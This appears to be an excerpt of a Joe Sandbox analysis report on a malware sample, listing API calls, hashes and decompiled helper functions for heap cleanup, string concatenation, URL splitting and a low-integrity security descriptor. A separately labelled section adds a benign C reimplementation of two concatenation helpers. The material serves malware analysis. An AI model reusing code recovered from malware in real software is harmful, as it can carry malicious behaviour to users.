          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E7873
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E7885
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CreateEvent$CloseHandlememset
          • String ID:
          • API String ID: 2812548120-0
          • Opcode ID: 0f5cc6eeffeaf15b6d5ee58128013c072003f4f48a3b55e6449b77ba509d7bd8
          • Instruction ID: edaeef65b91152c8fd4a0308f857e6da5c8719158f779194022a44ba7e51af9b
          • Opcode Fuzzy Hash: 0f5cc6eeffeaf15b6d5ee58128013c072003f4f48a3b55e6449b77ba509d7bd8
          • Instruction Fuzzy Hash: F1F054B110834C7FD3185F26DCC8C27BF9CFB95298B114D7EF18291511C671AC088A60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005C1C63), ref: 005C1FDE
          • GetVersion.KERNEL32(?,005C1C63), ref: 005C1FED
          • GetCurrentProcessId.KERNEL32(?,005C1C63), ref: 005C2009
          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005C1C63), ref: 005C2022
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: Process$CreateCurrentEventOpenVersion
          • String ID:
          • API String ID: 845504543-0
          • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction ID: 26d6ac30ba60a82db87eb8a3f85084285845ce19d672acb6c5f33ee932cdd053
          • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
          • Instruction Fuzzy Hash: FFF03CB05813019FE7509FB8BE0DB553F64B795752F10413AE641FA1E4E7B08982CB5C
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E3230() {
          				void* _t1;
          				intOrPtr _t5;
          				void* _t6;
          				void* _t7;
          				void* _t11;
          
          				_t1 =  *0x5ea30c; // 0x1b4
          				if(_t1 == 0) {
          					L8:
          					return 0;
          				}
          				SetEvent(_t1);
          				_t11 = 0x7fffffff;
          				while(1) {
          					SleepEx(0x64, 1);
          					_t5 =  *0x5ea35c; // 0x0
          					if(_t5 == 0) {
          						break;
          					}
          					_t11 = _t11 - 0x64;
          					if(_t11 > 0) {
          						continue;
          					}
          					break;
          				}
          				_t6 =  *0x5ea30c; // 0x1b4
          				if(_t6 != 0) {
          					CloseHandle(_t6);
          				}
          				_t7 =  *0x5ea2d8; // 0x27d0000
          				if(_t7 != 0) {
          					HeapDestroy(_t7);
          				}
          				goto L8;
          			}

          Addresses: 0x005e3230, 0x005e3237, 0x005e3281, 0x005e3283, 0x005e3283, 0x005e323b, 0x005e3241, 0x005e3246, 0x005e324a, 0x005e3250, 0x005e3257, 0x00000000, 0x00000000, 0x005e3259, 0x005e325e, 0x00000000, 0x00000000, 0x00000000, 0x005e325e, 0x005e3260, 0x005e3268, 0x005e326b, 0x005e326b, 0x005e3271, 0x005e3278, 0x005e327b, 0x005e327b, 0x00000000

          APIs
          • SetEvent.KERNEL32(000001B4,00000001,005E109A), ref: 005E323B
          • SleepEx.KERNEL32(00000064,00000001), ref: 005E324A
          • CloseHandle.KERNEL32(000001B4), ref: 005E326B
          • HeapDestroy.KERNEL32(027D0000), ref: 005E327B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CloseDestroyEventHandleHeapSleep
          • String ID:
          • API String ID: 4109453060-0
          • Opcode ID: 1f4acc4826d01aa264d3f23741b7115d6fd1d4caa9733805b2486a66088a056f
          • Instruction ID: fb5ac4ef0fd4e70848f0533f57d73e250540656604c5fd613d6da42f8ac02e72
          • Opcode Fuzzy Hash: 1f4acc4826d01aa264d3f23741b7115d6fd1d4caa9733805b2486a66088a056f
          • Instruction Fuzzy Hash: ADF03079A003D197DF1C9B769DCCA823FE8BB28761B040550FEC0EB2E1DB20E948B560
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
          				struct _FILETIME _v12;
          				void* _t11;
          				short _t19;
          				void* _t22;
          				void* _t24;
          				void* _t25;
          				short* _t26;
          
          				_t24 = __edx;
          				_t25 = E005E6536(_t11, _a12);
          				if(_t25 == 0) {
          					_t22 = 8;
          				} else {
          					_t26 = _t25 + _a16 * 2;
          					 *_t26 = 0;
          					_t22 = E005E330E(__ecx, _a4, _a8, _t25);
          					if(_t22 == 0) {
          						GetSystemTimeAsFileTime( &_v12);
          						_t19 = 0x5f;
          						 *_t26 = _t19;
          						_t22 = E005E7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
          					}
          					HeapFree( *0x5ea2d8, 0, _t25);
          				}
          				return _t22;
          			}

          Addresses: 0x005e5157, 0x005e5168, 0x005e516c, 0x005e51c7, 0x005e516e, 0x005e5175, 0x005e517d, 0x005e5185, 0x005e5189, 0x005e518f, 0x005e5197, 0x005e519a, 0x005e51b2, 0x005e51b2, 0x005e51bd, 0x005e51bd, 0x005e51ce

          APIs
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,02BC9270), ref: 005E518F
          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,02BC9270), ref: 005E51BD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
          • String ID: Uqt
          • API String ID: 1500278894-2320327147
          • Opcode ID: aa76b6749986b0f5c16afdf68eba047e3e44a08765ab1d69599b44edd34ee0c5
          • Instruction ID: a6e9885389238e9925772f0db43189d2add3fc5f12ad0737718b39dc4e4953b7
          • Opcode Fuzzy Hash: aa76b6749986b0f5c16afdf68eba047e3e44a08765ab1d69599b44edd34ee0c5
          • Instruction Fuzzy Hash: 5201D43220028ABBDF255FA6DC88F9A3F79FFC4714F400426FA809A161EA71D914D750
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 44%
          			E005E4332(void* __eax, char _a4) {
          
          				 *0x5ea354 =  *0x5ea354 & 0x00000000;
          				_push(0);
          				_push(" XO");
          				_push(1);
          				_t1 =  &_a4; // 0x4d283a53
          				_push( *_t1);
          				 *0x5ea34c = 0xc;
          				L005E5492();
          				return __eax;
          			}

          Addresses: 0x005e4332, 0x005e4339, 0x005e433b, 0x005e4340, 0x005e4342, 0x005e4342, 0x005e4346, 0x005e4350, 0x005e4355

          APIs
          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001, XO,00000000), ref: 005E4350
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: DescriptorSecurity$ConvertString
          • String ID: XO$S:(M
          • API String ID: 3907675253-3814029343
          • Opcode ID: e0aeec08efd97b2a4275c775952b6e7e8f525444988525a3df4d6f57676d6734
          • Instruction ID: be1f510e5f9c44f3ff3d9e58b1f998109314f6a5b36a4a5cdb27c2a02f249115
          • Opcode Fuzzy Hash: e0aeec08efd97b2a4275c775952b6e7e8f525444988525a3df4d6f57676d6734
          • Instruction Fuzzy Hash: 66C04C751443C1AAE62C9B259C46F157B917768706F144808F2C0281D1C7F9705C9A1B
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E005E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
          				intOrPtr* _v8;
          				void* _t17;
          				intOrPtr* _t22;
          				void* _t27;
          				char* _t30;
          				void* _t33;
          				void* _t34;
          				void* _t36;
          				void* _t37;
          				void* _t39;
          				int _t42;
          
          				_t17 = __eax;
          				_t37 = 0;
          				__imp__(_a4, _t33, _t36, _t27, __ecx);
          				_t2 = _t17 + 1; // 0x1
          				_t28 = _t2;
          				_t34 = E005E33DC(_t2);
          				if(_t34 != 0) {
          					_t30 = E005E33DC(_t28);
          					if(_t30 == 0) {
          						E005E61DA(_t34);
          					} else {
          						_t39 = _a4;
          						_t22 = E005E7AE9(_t39);
          						_v8 = _t22;
          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
          							_a4 = _t39;
          						} else {
          							_t26 = _t22 + 2;
          							_a4 = _t22 + 2;
          							_t22 = E005E7AE9(_t26);
          							_v8 = _t22;
          						}
          						if(_t22 == 0) {
          							__imp__(_t34, _a4);
          							 *_t30 = 0x2f;
          							 *((char*)(_t30 + 1)) = 0;
          						} else {
          							_t42 = _t22 - _a4;
          							memcpy(_t34, _a4, _t42);
          							 *((char*)(_t34 + _t42)) = 0;
          							__imp__(_t30, _v8);
          						}
          						 *_a8 = _t34;
          						_t37 = 1;
          						 *_a12 = _t30;
          					}
          				}
          				return _t37;
          			}

          Addresses: 0x005e2058, 0x005e2062, 0x005e2064, 0x005e206a, 0x005e206a, 0x005e2073, 0x005e2077, 0x005e2083, 0x005e2087, 0x005e20fb, 0x005e2089, 0x005e2089, 0x005e208d, 0x005e2092, 0x005e2097, 0x005e20b1, 0x005e20a0, 0x005e20a0, 0x005e20a4, 0x005e20a7, 0x005e20ac, 0x005e20ac, 0x005e20b6, 0x005e20de, 0x005e20e4, 0x005e20e7, 0x005e20b8, 0x005e20ba, 0x005e20c2, 0x005e20cd, 0x005e20d2, 0x005e20d2, 0x005e20ee, 0x005e20f5, 0x005e20f6, 0x005e20f6, 0x005e2087, 0x005e2106

          APIs
          • lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0), ref: 005E2064
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
            • Part of subcall function 005E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,005E2092,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102), ref: 005E7AF7
            • Part of subcall function 005E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?,?,747581D0,00000000), ref: 005E7B01
          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E51F7,?,?,?,?,00000102,005E21E7,?), ref: 005E20C2
          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E20D2
          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E20DE
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmp
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
          • String ID:
          • API String ID: 3767559652-0
          • Opcode ID: 4bf0eaeaed98ddebde5fcb758a6cbf7ce82019ef5420e927b0f3f1a5be899578
          • Instruction ID: fc83d20f824d7e92b692a7e01cb5e46dbda2ad5d6c4fe0e92a85255e32b5030b
          • Opcode Fuzzy Hash: 4bf0eaeaed98ddebde5fcb758a6cbf7ce82019ef5420e927b0f3f1a5be899578
          • Instruction Fuzzy Hash: C721F07210429AEBCB1A9F66CC8CA9E7FBDBF45390F148054F8859B202DA31DA40D7A1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E005E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
          				void* _v8;
          				void* _t18;
          				int _t25;
          				int _t29;
          				int _t34;
          
          				_t29 = lstrlenW(_a4);
          				_t25 = lstrlenW(_a8);
          				_t18 = E005E33DC(_t25 + _t29 + _t25 + _t29 + 2);
          				_v8 = _t18;
          				if(_t18 != 0) {
          					_t34 = _t29 + _t29;
          					memcpy(_t18, _a4, _t34);
          					_t10 = _t25 + 2; // 0x2
          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
          				}
          				return _v8;
          			}

          Addresses: 0x005e5df9, 0x005e5dfd, 0x005e5e07, 0x005e5e0c, 0x005e5e11, 0x005e5e13, 0x005e5e1b, 0x005e5e20, 0x005e5e2e, 0x005e5e33, 0x005e5e3d

          APIs
          • lstrlenW.KERNEL32(004F0053,?,74715520,00000008,02BC9270,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5DF4
          • lstrlenW.KERNEL32(005E52D0,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5DFB
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • memcpy.NTDLL(00000000,004F0053,747169A0,?,?,005E52D0,004F0053,02BC9270,?,?,?,?,?,?,005E68B6), ref: 005E5E1B
          • memcpy.NTDLL(747169A0,005E52D0,00000002,00000000,004F0053,747169A0,?,?,005E52D0,004F0053,02BC9270), ref: 005E5E2E
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlenmemcpy$AllocateHeap
          • String ID:
          • API String ID: 2411391700-0
          • Opcode ID: 5ea78fb5c9cf9f954604e2cda3710a1aff63dc556def0714e3b0c3b401a0194e
          • Instruction ID: b757f26b777bac9b6d839448e95c5899312624b82504ae3a5cc7e38abd0f4ae1
          • Opcode Fuzzy Hash: 5ea78fb5c9cf9f954604e2cda3710a1aff63dc556def0714e3b0c3b401a0194e
          • Instruction Fuzzy Hash: 7BF03772900519BB8F15AFA9CC89C8E7BADEF482587114062F94897202EA31EA149BA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
          • lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
          • lstrcat.KERNEL32(00000000,?), ref: 005E759A
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
          • String ID:
          • API String ID: 74227042-0
          • Opcode ID: acb0f3129a59df5d8cca6deef40dd429f29bf848b284e961e900d55accb86a66
          • Instruction ID: bd2086f4776bce7bd3b10f54d3011e8722f1566d6ea2e5a56ce98612138964a1
          • Opcode Fuzzy Hash: acb0f3129a59df5d8cca6deef40dd429f29bf848b284e961e900d55accb86a66
          • Instruction Fuzzy Hash: 1FE092739016A5AB8715ABA9AC8CC5FBBADFF9D760304081AF640D7110D7319905DBA1
          Uniqueness

          Uniqueness Score: -1.00%
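          Added illustration, not part of the Joe Sandbox report and not the sample's own code: a portable C re-implementation of the two concatenation helpers recorded above, the UTF-16 one at 005E5DE4 (lstrlenW, lstrlenW, RtlAllocateHeap via 005E33DC, memcpy, memcpy) and the narrow one at 005E7573..005E759A (lstrlen, lstrlen, RtlAllocateHeap via 005E33DC, lstrcpy, lstrcat). The point for an analyst reading the dump is the size arithmetic: the allocation expression `_t25 + _t29 + _t25 + _t29 + 2` is 2*(len(a)+len(b)) + 2 bytes, and the second memcpy copies 2*len(b) + 2 bytes, so the NUL terminator is taken from the second argument rather than written separately. The names concat_wide, concat_narrow, wide_alloc_bytes, the check_* helpers and the sample strings are mine; WCHAR is emulated as uint16_t so the byte arithmetic matches Windows on any host; the allocation size of the narrow variant (len(a)+len(b)+1) is an assumption, since the report lists its APIs but not that value.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Windows WCHAR is a 16-bit unit; emulate it explicitly so the byte arithmetic
   below matches the dumped function on any host (Linux wchar_t is 32-bit). */
typedef uint16_t WCHAR16;

/* Stand-in for lstrlenW: number of 16-bit units before the terminator. */
static size_t wlen16(const WCHAR16 *s) {
    size_t n = 0;
    while (s[n] != 0) n++;
    return n;
}

/* Allocation size used by E005E5DE4: 2*len(a) + 2*len(b) + 2 bytes, written in
   the dump as _t25 + _t29 + _t25 + _t29 + 2 (each length counted twice, plus
   one 16-bit terminator). */
size_t wide_alloc_bytes(size_t la, size_t lb) {
    return 2 * la + 2 * lb + 2;
}

/* Portable equivalent of E005E5DE4: returns a fresh heap buffer holding a||b
   as a NUL-terminated UTF-16 string, or NULL on failure (the original returns
   NULL when RtlAllocateHeap fails). */
WCHAR16 *concat_wide(const WCHAR16 *a, const WCHAR16 *b) {
    size_t la = wlen16(a), lb = wlen16(b);
    /* The original does the size math in int; guard it here so this
       reimplementation cannot wrap on absurd lengths. */
    if (la >= SIZE_MAX / 4 || lb >= SIZE_MAX / 4) return NULL;
    WCHAR16 *out = malloc(wide_alloc_bytes(la, lb));   /* RtlAllocateHeap */
    if (out == NULL) return NULL;
    memcpy(out, a, 2 * la);            /* first memcpy: a without its terminator */
    memcpy(out + la, b, 2 * lb + 2);   /* second memcpy: b plus its terminator */
    return out;
}

/* Portable equivalent of the narrow variant at 005E7573..005E759A
   (lstrlen, lstrlen, allocate, lstrcpy, lstrcat). The report does not show the
   allocation size; len(a)+len(b)+1 is assumed here. */
char *concat_narrow(const char *a, const char *b) {
    size_t la = strlen(a), lb = strlen(b);
    if (la > SIZE_MAX - 1 - lb) return NULL;
    char *out = malloc(la + lb + 1);   /* assumed size, see comment above */
    if (out == NULL) return NULL;
    strcpy(out, a);   /* lstrcpy */
    strcat(out, b);   /* lstrcat */
    return out;
}

/* Helpers for checking: widen ASCII into 16-bit units and compare back. */
static void ascii_to_w16(const char *s, WCHAR16 *out) {
    size_t i;
    for (i = 0; s[i] != '\0'; i++) out[i] = (WCHAR16)(unsigned char)s[i];
    out[i] = 0;
}

static int w16_equals_ascii(const WCHAR16 *w, const char *s) {
    size_t i;
    for (i = 0; s[i] != '\0'; i++)
        if (w[i] != (WCHAR16)(unsigned char)s[i]) return 0;
    return w[i] == 0;
}

/* Round-trip check: 1 if concat_wide(a, b) equals expected, else 0. */
int check_wide_concat(const char *a, const char *b, const char *expected) {
    WCHAR16 wa[128], wb[128];
    if (strlen(a) >= 128 || strlen(b) >= 128) return 0;
    ascii_to_w16(a, wa);
    ascii_to_w16(b, wb);
    WCHAR16 *r = concat_wide(wa, wb);
    int ok = r != NULL && w16_equals_ascii(r, expected)
             && wlen16(r) == strlen(a) + strlen(b);
    free(r);
    return ok;
}

/* Same check for the narrow variant. */
int check_narrow_concat(const char *a, const char *b, const char *expected) {
    char *r = concat_narrow(a, b);
    int ok = r != NULL && strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int main(void) {
    /* Constructed inputs; the strings are illustrative, not taken from the sample. */
    printf("wide   : %d\n", check_wide_concat("C:\\Users\\", "user", "C:\\Users\\user"));
    printf("narrow : %d\n", check_narrow_concat("/images/", "x.png", "/images/x.png"));
    printf("bytes  : %zu\n", wide_alloc_bytes(9, 4));   /* 2*9 + 2*4 + 2 = 28 */
    return 0;
}
```

          Build with `cc -std=c99 -Wall` and run; the two checks print 1 and the size line prints 28. Working through the byte counts this way is the quickest confirmation that the decompiler's `_t25 + _t10` (2*len2 + 2) really does carry the terminator across, which is what makes the returned buffer a valid NUL-terminated string without an explicit write of the final WCHAR.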